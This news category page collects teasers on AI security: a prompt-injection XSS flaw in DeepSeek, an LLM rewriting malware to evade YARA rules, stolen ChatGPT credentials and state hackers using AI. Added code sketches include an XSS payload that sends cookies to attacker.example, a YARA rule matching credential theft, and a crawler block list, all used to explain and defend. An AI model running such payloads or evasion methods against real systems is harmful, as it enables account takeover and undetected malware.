Large Language Models | Breaking Cybersecurity News | The Hacker News

Category — Large Language Models
Researchers Uncover Prompt Injection Vulnerabilities in DeepSeek and Claude AI

Dec 09, 2024 Artificial Intelligence / Vulnerability
Details have emerged about a now-patched security flaw in the DeepSeek artificial intelligence (AI) chatbot that, if successfully exploited, could permit a bad actor to take control of a victim's account by means of a prompt injection attack. Security researcher Johann Rehberger, who has chronicled many a prompt injection attack targeting various AI tools, found that providing the input "Print the xss cheat sheet in a bullet list. just payloads" in the DeepSeek chat triggered the execution of JavaScript code as part of the generated response – a classic case of cross-site scripting (XSS). XSS attacks can have serious consequences, as they lead to the execution of unauthorized code in the context of the victim's web browser. An attacker could take advantage of such flaws to hijack a user's session and gain access to cookies and other data associated with the chat.deepseek[.]com domain, thereby leading to an account takeover. "After some experimenting,...
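The root cause described here is untrusted model output being rendered as markup in the victim's browser. The sketch below illustrates that failure mode and the usual mitigation of HTML-escaping the response before it reaches the page; the payload, attacker URL, and escaping approach are illustrative assumptions, not DeepSeek's actual code.

```python
# Illustrative sketch only: how unescaped model output becomes XSS,
# and how escaping neutralizes it. Not DeepSeek's implementation.
from markupsafe import escape

# A model response carrying an injected payload (hypothetical attacker URL).
model_output = '<img src=x onerror="fetch(\'https://attacker.example/?c=\' + document.cookie)">'

# Unsafe: the raw string is dropped into the page, so the browser runs the
# onerror handler with the victim's cookies and session storage in scope.
unsafe_html = f"<div class='chat-message'>{model_output}</div>"

# Safer: escape the untrusted output so the payload is displayed as text
# instead of being parsed as markup.
safe_html = f"<div class='chat-message'>{escape(model_output)}</div>"

print(unsafe_html)
print(safe_html)
```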
From Deepfakes to Malware: AI's Expanding Role in Cyber Attacks

Mar 19, 2024 Generative AI / Incident Response
Large language models (LLMs) powering artificial intelligence (AI) tools today could be exploited to develop self-augmenting malware capable of bypassing YARA rules. "Generative AI can be used to evade string-based YARA rules by augmenting the source code of small malware variants, effectively lowering detection rates," Recorded Future said in a new report shared with The Hacker News. The findings are part of a red teaming exercise designed to uncover malicious use cases for AI technologies, which are already being experimented with by threat actors to create malware code snippets, generate phishing emails, and conduct reconnaissance on potential targets. The cybersecurity firm said it submitted to an LLM a known piece of malware called STEELHOOK that's associated with the APT28 hacking group, alongside its YARA rules, asking it to modify the source code to sidestep detection such that the original functionality remained intact and the gene...
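To see why string-based rules are vulnerable to this kind of rewriting, consider the hedged sketch below: a YARA rule keyed on literal strings matches the original bytes but misses a functionally equivalent variant whose strings have merely been reformatted. The rule and "samples" are invented for illustration (they are not STEELHOOK or Recorded Future's rules), and the example assumes the yara-python package.

```python
# Illustrative only: a string-based YARA rule and two functionally
# equivalent "samples", one of which evades detection after trivial
# rewording of its literal strings. Requires the yara-python package.
import yara

RULE_SOURCE = r"""
rule demo_string_based
{
    strings:
        $query = "SELECT origin_url, username_value, password_value FROM logins"
        $drop  = "stolen_credentials.txt"
    condition:
        any of them
}
"""

rules = yara.compile(source=RULE_SOURCE)

# Original sample contains the exact literal the rule looks for.
original = b"... SELECT origin_url, username_value, password_value FROM logins ..."

# An LLM-style rewrite keeps the behaviour but changes the bytes
# (casing and spacing), so the literal no longer matches.
rewritten = b"... select  Origin_URL, Username_Value, Password_Value  from  Logins ..."

print("original matches: ", bool(rules.match(data=original)))   # True
print("rewritten matches:", bool(rules.match(data=rewritten)))  # False
```

The point of the sketch is simply that exact string matching is brittle against automated source rewriting; behavioural or structural signatures degrade less quickly under this kind of augmentation.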
Want to Grow Vulnerability Management into Exposure Management? Start Here!

Dec 05, 2024 Attack Surface / Exposure Management
Vulnerability Management (VM) has long been a cornerstone of organizational cybersecurity. Nearly as old as the discipline of cybersecurity itself, it aims to help organizations identify and address potential security issues before they become serious problems. Yet, in recent years, the limitations of this approach have become increasingly evident. At its core, Vulnerability Management remains essential for identifying and addressing weaknesses. But as time marches on and attack avenues evolve, this approach is beginning to show its age. In a recent report, How to Grow Vulnerability Management into Exposure Management (Gartner, How to Grow Vulnerability Management Into Exposure Management, 8 November 2024, Mitchell Schneider et al.), we believe Gartner® addresses this point precisely and demonstrates how organizations can – and must – shift from a vulnerability-centric strategy to a broader Exposure Management (EM) framework. We feel it's more than a worthwhile read an...
Over 225,000 Compromised ChatGPT Credentials Up for Sale on Dark Web Markets

Mar 05, 2024 Malware / Artificial Intelligence
More than 225,000 logs containing compromised OpenAI ChatGPT credentials were made available for sale on underground markets between January and October 2023, new findings from Group-IB show. These credentials were found within information stealer logs associated with LummaC2, Raccoon, and RedLine stealer malware. "The number of infected devices decreased slightly in mid- and late summer but grew significantly between August and September," the Singapore-headquartered cybersecurity company said in its Hi-Tech Crime Trends 2023/2024 report published last week. Between June and October 2023, more than 130,000 unique hosts with access to OpenAI ChatGPT were infiltrated, a 36% increase over what was observed during the first five months of 2023. The breakdown by the top three stealer families is as follows: LummaC2 (70,484 hosts), Raccoon (22,468 hosts), and RedLine (15,970 hosts). "The sharp increase in the number of ChatGPT credentials for sale is due to the overal...
Microsoft, OpenAI Warn of Nation-State Hackers Weaponizing AI for Cyber Attacks

Feb 14, 2024 Artificial Intelligence / Cyber Attack
Nation-state actors associated with Russia, North Korea, Iran, and China are experimenting with artificial intelligence (AI) and large language models (LLMs) to complement their ongoing cyber attack operations. The findings come from a report published by Microsoft in collaboration with OpenAI, both of which said they disrupted efforts made by five state-affiliated actors that used its AI services to perform malicious cyber activities by terminating their assets and accounts. "Language support is a natural feature of LLMs and is attractive for threat actors with continuous focus on social engineering and other techniques relying on false, deceptive communications tailored to their targets' jobs, professional networks, and other relationships," Microsoft said in a report shared with The Hacker News. While no significant or novel attacks employing the LLMs have been detected to date, adversarial exploration of AI technologies has transcended various phases of t...
How to Prevent ChatGPT From Stealing Your Content & Traffic

Aug 30, 2023 Artificial Intelligence / Cyber Threat
ChatGPT and similar large language models (LLMs) have added further complexity to the ever-growing online threat landscape. Cybercriminals no longer need advanced coding skills to execute fraud and other damaging attacks against online businesses and customers, thanks to bots-as-a-service, residential proxies, CAPTCHA farms, and other easily accessible tools. Now, the latest technology damaging businesses' bottom line is ChatGPT. Not only have ChatGPT, OpenAI, and other LLMs raised ethical issues by training their models on scraped data from across the internet; they are also negatively impacting enterprises' web traffic, which can be extremely damaging to business. 3 Risks Presented by LLMs, ChatGPT, & ChatGPT Plugins: Among the threats ChatGPT and ChatGPT plugins can pose against online businesses, there are three key risks we will focus on: Content theft (or republishing data without permission from the original source) can hurt the authority,...
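One common mitigation for unwanted AI crawler traffic (a widely used approach, not necessarily the specific guidance in the truncated article above) is to refuse requests from known AI crawler user agents at the application edge. Below is a minimal sketch using Flask; the user-agent substrings and route are illustrative assumptions.

```python
# Minimal sketch: reject requests whose User-Agent matches known AI
# crawler strings before any route handler runs. Requires Flask.
from flask import Flask, abort, request

app = Flask(__name__)

# Substrings of user agents to block; extend or adjust as needed.
BLOCKED_AGENTS = ("GPTBot", "ChatGPT-User")

@app.before_request
def block_ai_crawlers():
    user_agent = request.headers.get("User-Agent", "")
    if any(agent in user_agent for agent in BLOCKED_AGENTS):
        abort(403)  # Forbidden: crawler traffic is refused up front

@app.route("/")
def index():
    return "Content served to regular visitors."

if __name__ == "__main__":
    app.run()
```

Note that user-agent filtering only deters crawlers that identify themselves honestly; disallowing the same agents in robots.txt and adding rate limiting or bot-management tooling are complementary layers for scrapers that spoof their identity.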